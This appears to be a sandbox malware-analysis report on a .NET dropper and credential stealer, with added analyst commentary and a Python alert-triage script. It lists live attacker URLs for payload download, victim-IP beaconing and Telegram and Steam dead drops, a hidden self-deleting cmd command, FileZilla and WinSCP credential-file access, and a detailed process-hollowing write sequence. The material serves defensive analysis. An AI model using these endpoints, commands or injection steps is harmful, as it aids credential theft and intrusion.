Summary | ZeroBOX

66e7df2dec2db_vnasdsadl.exe

Tags: Client SW User Data Stealer, LokiBot info stealer, ftp Client, Antivirus, Malicious Library, Code injection, HTTP, PWS, Internet API, Http API, .NET EXE, PE32, PE File, AntiVM, AntiDebug
Category: FILE
Machine: s1_win7_x6403_us
Started: Sept. 17, 2024, 1:39 p.m.
Completed: Sept. 17, 2024, 1:48 p.m.
Size: 135.5KB
Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 458d31ecc5a490d5bda8d52e7ca8a5b6
SHA256: d574de9b5d8f74451207c6b4f2b6f63e1b58f8d8f50dc03a722638c866a41f50
CRC32: 8F490706
ssdeep: 3072:f5zF1UvqLHTCCrSIpnwF8vIzKJjGjssSDrI8pSQbAAmVBVa5GKYzEO:71zLN+WvnHsSv1zJmV2SEO
PDB Path: c:\rebexihmjg\obj\Release\' .pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Antivirus - Contains references to security software
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

IP Address Status Action
104.26.12.205 Active Moloch
104.74.170.104 Active Moloch
147.45.44.104 Active Moloch
149.154.167.99 Active Moloch
164.124.101.2 Active Moloch
78.47.207.136 Active Moloch

Suricata Alerts

Flow | SID | Signature | Category
UDP 192.168.56.103:64894 -> 8.8.8.8:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity
TCP 149.154.167.99:443 -> 192.168.56.103:49172 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.26.12.205:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected
TCP 192.168.56.103:49171 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
UDP 192.168.56.103:64894 -> 164.124.101.2:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.103:49171 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
TCP 147.45.44.104:80 -> 192.168.56.103:49166 | 2400022 | ET DROP Spamhaus DROP Listed Traffic Inbound group 23 | Misc Attack
TCP 78.47.207.136:443 -> 192.168.56.103:49177 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 104.74.170.104:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.103:49165 -> 147.45.44.104:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49165 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49165 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
TCP 192.168.56.103:49170 -> 149.154.167.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.103:49170 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
TCP 192.168.56.103:49170 -> 149.154.167.99:443 | 2041933 | ET INFO Observed Telegram Domain (t .me in TLS SNI) | Misc activity
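The alert table above lists one rule firing per flow; to read it as a chain you have to group rows by the remote endpoint and separate content-level alerts (an MZ response, a t.me SNI, a DROP-listed source) from fingerprint-level ones. The Python below is an added example for this page, not ZeroBOX or Emerging Threats code: it parses rows in the flattened form printed above, maps the SIDs that occur in this report to a stage (that mapping is my own grouping, an assumption, not an ET or SSLBL category), and ranks each remote host. The sample rows are a subset copied from the table above.

```python
"""Correlate flattened Suricata alert rows into per-host stages and a triage verdict (added example)."""
import re
from collections import defaultdict

ALERT_RE = re.compile(r"^(TCP|UDP)\s+(\S+)\s+->\s+(\S+)\s+(\d+)\s+(.+)$")
SANDBOX_NET = "192.168.56."  # the analysis VM's /24 in this report

# Stage label per SID as printed in this report. Assumption: the editor's own
# grouping, not an ET/SSLBL classification.
SID_STAGE = {
    2047702: "external_ip_lookup",    # ipify.org in DNS
    2021997: "external_ip_lookup",    # api.ipify.org over HTTP
    2016141: "payload_download",      # executable from dotted-quad host
    2018959: "payload_download",      # PE EXE/DLL over HTTP
    2021076: "payload_download",      # MZ response from dotted-quad host
    2041933: "telegram_dead_drop",    # t.me in TLS SNI
    906200054: "ja3_blocklist",       # SSLBL JA3 hit: fingerprints the client TLS stack
    2400022: "spamhaus_drop",         # inbound from a DROP-listed range
    2029340: "tls_handshake_failure",
}
# Stages that describe content or reputation, not just a client fingerprint.
CORROBORATING = {"payload_download", "telegram_dead_drop", "spamhaus_drop"}


def parse_alerts(text):
    """One dict per row; the remote endpoint is whichever side is not the sandbox VM."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        proto, src, dst, sid, rest = m.groups()
        inbound = not src.startswith(SANDBOX_NET)
        remote = src if inbound else dst
        alerts.append({"proto": proto, "src": src, "dst": dst, "sid": int(sid),
                       "text": rest, "inbound": inbound,
                       "remote_ip": remote.rsplit(":", 1)[0]})
    return alerts


def stages_by_host(alerts):
    """Remote IP -> stages in first-seen order (duplicate firings collapse)."""
    stages = defaultdict(list)
    for a in alerts:
        stage = SID_STAGE.get(a["sid"], "unknown")
        if stage not in stages[a["remote_ip"]]:
            stages[a["remote_ip"]].append(stage)
    return dict(stages)


def triage(alerts):
    """'investigate' needs a corroborating stage; a JA3 or handshake alert alone is 'weak'."""
    verdicts = {}
    for host, stages in stages_by_host(alerts).items():
        strong = sorted(CORROBORATING.intersection(stages))
        if strong:
            verdicts[host] = "investigate: " + ",".join(strong)
        elif "external_ip_lookup" in stages:
            verdicts[host] = "recon: external IP lookup (behaviour, not a bad host)"
        else:
            verdicts[host] = "weak: fingerprint/handshake only"
    return verdicts


# Constructed subset: rows copied from this report's Suricata table.
SAMPLE_ALERTS = """
UDP 192.168.56.103:64894 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49164 -> 104.26.12.205:80 2021997 ET POLICY External IP Lookup api.ipify.org Device Retrieving External IP Address Detected
TCP 192.168.56.103:49171 -> 149.154.167.99:443 2041933 ET INFO Observed Telegram Domain (t .me in TLS SNI) Misc activity
TCP 192.168.56.103:49171 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 147.45.44.104:80 -> 192.168.56.103:49166 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.103:49174 -> 104.74.170.104:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 78.47.207.136:443 -> 192.168.56.103:49177 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
"""

if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    for host, verdict in sorted(triage(parsed).items()):
        print(f"{host:16} {verdict}  stages={stages_by_host(parsed)[host]}")
```

The downgrade of the JA3 rule is deliberate: the same "Tofsee" fingerprint fires on 104.74.170.104, whose certificate in the TLS section below is store.steampowered.com, so it identifies the client TLS stack, not the family. 147.45.44.104 ranks highest on its own evidence (a PE served from a bare IP, plus a Spamhaus DROP listing), and 149.154.167.99 on the t.me SNI.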

Suricata TLS

Flow | Version | Issuer | Subject | Fingerprint (SHA1)
192.168.56.103:49174 -> 104.74.170.104:443 | TLSv1 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | 10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5

The three unknown= fields are the EV jurisdiction and businessCategory attributes that Suricata prints without a name. This is the connection on which the SSLBL "Tofsee" JA3 alert also fired, to a valid Valve certificate.

Time & API | Arguments | Status | Return | Repeated
GetComputerNameA | computer_name: TEST22-PC | 1 | 1 | 0   (15 calls)
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0   (2 calls)
GetComputerNameA | computer_name: TEST22-PC | 1 | 1 | 0   (1 further call)
Time & API | Arguments | Status | Return | Repeated
IsDebuggerPresent | (none) | 0 0   (4 calls)
Time & API | Arguments | Status | Return | Repeated
WriteConsoleA | buffer: "Person 0" through "Person 49" (50 calls, one string each, in sequence); console_handle: 0x00000007 | 1 | 1 | 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path c:\rebexihmjg\obj\Release\' .pdb
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion
Time & API | Arguments | Status | Return | Repeated
GlobalMemoryStatusEx | (none) | 1 | 1 | 0
suspicious_features: Connection to IP address | suspicious_request: GET http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
suspicious_features: Connection to IP address | suspicious_request: GET http://147.45.44.104/get.php?ip=175.208.134.152
suspicious_features: GET method with no useragent header | suspicious_request: GET https://steamcommunity.com/profiles/76561199768374681
request: GET http://api.ipify.org/
request: GET http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
request: GET http://147.45.44.104/get.php?ip=175.208.134.152
request: GET https://steamcommunity.com/profiles/76561199768374681

The ip= parameter of the get.php request carries a public IPv4 address, consistent with the value returned by the api.ipify.org lookup that precedes it: the operator's server is told the victim's external address. The Steam profile and the t.me URL listed further down are fetched without a User-Agent, the usual shape of a dead-drop resolver.
Time & API | PID | process_handle | base_address | region_size / length | allocation_type | protection | heap_dep_bypass
(every row: stack_dep_bypass 0, stack_pivoted 0; Status 1, Return 0, Repeated 0)
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x008a0000 | 1703936 | 8192 (MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00a00000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtProtectVirtualMemory | 1440 | 0xffffffff | 0x73f31000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 1440 | 0xffffffff | 0x73f32000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00640000 | 1376256 | 8192 (MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00750000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00322000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00355000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x0035b000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x00357000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x0033c000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x006a0000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 1440 | 0xffffffff | 0x0032a000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtProtectVirtualMemory | 1440 | 0xffffffff | 0x02311000 | 8192 | - | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00570000 | 524288 | 8192 (MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x005b0000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtProtectVirtualMemory | 2308 | 0xffffffff | 0x73f81000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2308 | 0xffffffff | 0x73f82000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00b70000 | 1900544 | 8192 (MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00d00000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00432000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00575000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x0057b000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x00577000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x0045c000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x009a0000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtAllocateVirtualMemory | 2308 | 0xffffffff | 0x0043a000 | 4096 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 1
NtProtectVirtualMemory | 2308 | 0xffffffff | 0x02772000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 1
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x76971000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x74fc1000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 2400 | 0xffffffff | 0x00390000 | 4096 | 12289 (MEM_COMMIT|MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x74721000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x74701000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x74451000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x74361000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x73bf1000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x73241000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x731e1000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x730e1000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x73091000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x72fb1000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x73071000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtProtectVirtualMemory | 2400 | 0xffffffff | 0x73051000 | 4096 | - | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 1236 | 0xffffffffffffffff | 0x00000000043b0000 | 65536 | 4096 (MEM_COMMIT) | 64 (PAGE_EXECUTE_READWRITE) | 0

Reading the table: 0xffffffff is the current-process pseudo-handle, so every row here is a process changing its own address space. PIDs 1440 and 2308 show the same shape (one large RWX reservation, a run of 4 KB RWX commits, and an RWX protect of two adjacent pages inside a loaded module plus one heap page), which is what a .NET runtime's JIT and loader heaps typically look like, so on its own it is weak evidence. PID 2400, the process that later receives an injected image through handle 0x00000208 (see the WriteProcessMemory entries below), instead flips the first code page (module base + 0x1000) of fourteen loaded DLLs to RWX; that is the footprint of inline hooking or unhooking of those modules, whether by the payload or by the monitoring agent, so treat it as context rather than a standalone finding. PID 1236 is a 64-bit process (eight-byte handle and address).
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
cmdline "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
cmdline C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
file C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe
wmi
Time & API | Arguments | Status | Return | Repeated
ShellExecuteExW | show_type: 0; filepath_r: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe; parameters: (empty); filepath: C:\Users\test22\AppData\Local\Temp\TempFolder\downloaded_file.exe | 1 | 1 | 0
ShellExecuteExW | show_type: 0; filepath_r: C:\Windows\system32\cmd.exe; parameters: /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit; filepath: C:\Windows\System32\cmd.exe | 1 | 1 | 0

show_type 0 is SW_HIDE. The second launch is the self-cleanup step: timeout /t 10 lets the launching process exit and release its file handles before del removes the RegAsm.exe host and rd removes the ProgramData working directory. Note that the del target is the real .NET Framework RegAsm.exe path, not a copy.
Time & API | Arguments | Status | Return | Repeated
InternetReadFile | request_handle: 0x00cc000c; buffer: a PE image beginning "MZ ... This program cannot be run in DOS mode." with a PE header whose only sections are .text, .rsrc and .reloc (the layout of a managed .NET image); the rest of the buffer is non-printable binary and is not reproduced here | 1 | 1 | 0
section: .text (virtual_address 0x00002000, virtual_size 0x0001eb14, size_of_data 0x0001ec00), entropy 7.9758 | description: A section with a high entropy has been found
entropy: 0.9801 | description: Overall entropy of this PE file is high

The two figures are on different scales: the section value is bits per byte (maximum 8) and marks .text as packed or encrypted, while the overall value is the fraction of the file's section data that the signature classed as high-entropy, here almost all of it.
url http://147.45.44.104/get.php?ip=
url http://api.ipify.org
url http://147.45.44.104/prog/66e7dde32d7a4_vdsfg.exe
url https://t.me/edm0d
url https://steamcommunity.com/profiles/76561199768374681
rule | description   (first match set)
DebuggerCheck__GlobalFlags | (no description)
DebuggerCheck__QueryInfo | (no description)
DebuggerHiding__Thread | (no description)
DebuggerHiding__Active | (no description)
ThreadControl__Context | (no description)
SEH__vectored | (no description)
anti_dbg | Checks if being debugged
disable_dep | Bypass DEP
Str_Win32_Internet_API | Match Windows Inet API call
Client_SW_User_Data_Stealer | Client_SW_User_Data_Stealer
infoStealer_ftpClients_Zero | ftp clients info stealer
Str_Win32_Http_API | Match Windows Http API call
Generic_PWS_Memory_Zero | PWS Memory
Network_HTTP | Communications over HTTP
Code_injection | Code injection with CreateRemoteThread in a remote process

rule | description   (second match set)
DebuggerCheck__GlobalFlags | (no description)
DebuggerCheck__QueryInfo | (no description)
DebuggerHiding__Thread | (no description)
DebuggerHiding__Active | (no description)
DebuggerException__SetConsoleCtrl | (no description)
ThreadControl__Context | (no description)
SEH__vectored | (no description)
Check_Dlls | (no description)
anti_dbg | Checks if being debugged
antisb_threatExpert | Anti-Sandbox checks for ThreatExpert
disable_dep | Bypass DEP
Str_Win32_Internet_API | Match Windows Inet API call
Win32_PWS_Loki_m_Zero | Win32 PWS Loki

rule | description   (third match set)
DebuggerCheck__GlobalFlags | (no description)
DebuggerCheck__QueryInfo | (no description)
DebuggerHiding__Thread | (no description)
DebuggerHiding__Active | (no description)
DebuggerException__SetConsoleCtrl | (no description)
ThreadControl__Context | (no description)
SEH__vectored | (no description)
anti_dbg | Checks if being debugged
disable_dep | Bypass DEP

The three sets are separate matches; the page does not say which dumped image each fired on. The "LokiBot info stealer" tag in the header rests on the single Win32_PWS_Loki_m_Zero match in the second set, so treat it as a string-rule hit rather than confirmed attribution.
cmdline "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
cmdline C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\AEHIJDAFBKFH" & exit
host 147.45.44.104
host 78.47.207.136
Time & API | PID | process_handle | base_address | region_size | allocation_type | protection | heap_dep_bypass
(both rows: stack_dep_bypass 0, stack_pivoted 0; Status 1, Return 0, Repeated 0)
NtAllocateVirtualMemory | 2156 | 0x00000204 | 0x00400000 | 135168 | 12288 (MEM_COMMIT|MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0
NtAllocateVirtualMemory | 2400 | 0x00000208 | 0x00400000 | 2453504 | 12288 (MEM_COMMIT|MEM_RESERVE) | 64 (PAGE_EXECUTE_READWRITE) | 0

Unlike the earlier memory table, the handles here (0x00000204, 0x00000208) are handles opened to other processes, and the target address is 0x00400000, the default image base of a 32-bit executable. The region sizes are page-aligned image sizes (135168 = 0x21000, 2453504 = 0x257000), which is what a RunPE loader reserves for the image it is about to write.
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Time & API | Arguments | Status | Return | Repeated
WriteProcessMemory | process_identifier: 2156; process_handle: 0x00000204; base_address: 0x00400000; buffer: an MZ/PE header ("This program cannot be run in DOS mode.", a "Rich" header, sections .text .rdata .data .rsrc .reloc; the remaining bytes are binary and are not reproduced here) | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2156; process_handle: 0x00000204; base_address: 0x00407000; buffer: MSVC RTTI type descriptors (.?AVbad_alloc@std@@, .?AVbad_cast@std@@, .?AVexception@std@@, .?AVbad_array_new_length@std@@, .?AVtype_info@@, .?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@, .?AVios_base@std@@, .?AV?$_Iosb@H@std@@, .?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@, .?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@, .?AV?$basic_ios@DU?$char_traits@D@std@@@std@@, .?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@) | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2156; process_handle: 0x00000204; base_address: 0x00420000; buffer: relocation-table data (binary, not reproduced) | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2156; process_handle: 0x00000204; base_address: 0x7efde008; buffer: @ (four bytes; 0x00400000 in little-endian order, of which only 0x40 "@" is printable) | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2400; process_handle: 0x00000208; base_address: 0x00400000; buffer: an MZ/PE header ("Rich" header, sections .text .rdata .data .rsrc .reloc; remainder binary, not reproduced) | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2400; process_handle: 0x00000208; base_address: 0x00651000; buffer: resource data: <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly> followed by PADDINGXXPADDING filler | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2400; process_handle: 0x00000208; base_address: 0x7efde008; buffer: @ (four bytes, as above) | 1 | 1 | 0

Time & API | Arguments | Status | Return | Repeated
WriteProcessMemory | process_identifier: 2156; process_handle: 0x00000204; base_address: 0x00400000; buffer: the same MZ/PE header as in the first table | 1 | 1 | 0
WriteProcessMemory | process_identifier: 2400; process_handle: 0x00000208; base_address: 0x00400000; buffer: the same MZ/PE header as in the first table | 1 | 1 | 0

This is the RunPE (process hollowing) write sequence in full: a complete native PE32 image (the Rich header and the std:: RTTI names mark an MSVC-linked C++ binary, not the .NET dropper) is copied section by section into the RWX region reserved at the target's 0x00400000, then the four-byte ImageBaseAddress field at PEB+0x8 is overwritten; 0x7efde000 is the usual 32-bit PEB of a WOW64 process on Windows 7 x64. Two different images go into two targets (handles 0x00000204 and 0x00000208), and the 0x00651000 write for PID 2400 falls inside the 0x00400000-0x00657000 range reserved for it. The second table repeats the two header writes under another signature.
Time & API Arguments Status Return Repeated

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x000005cc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
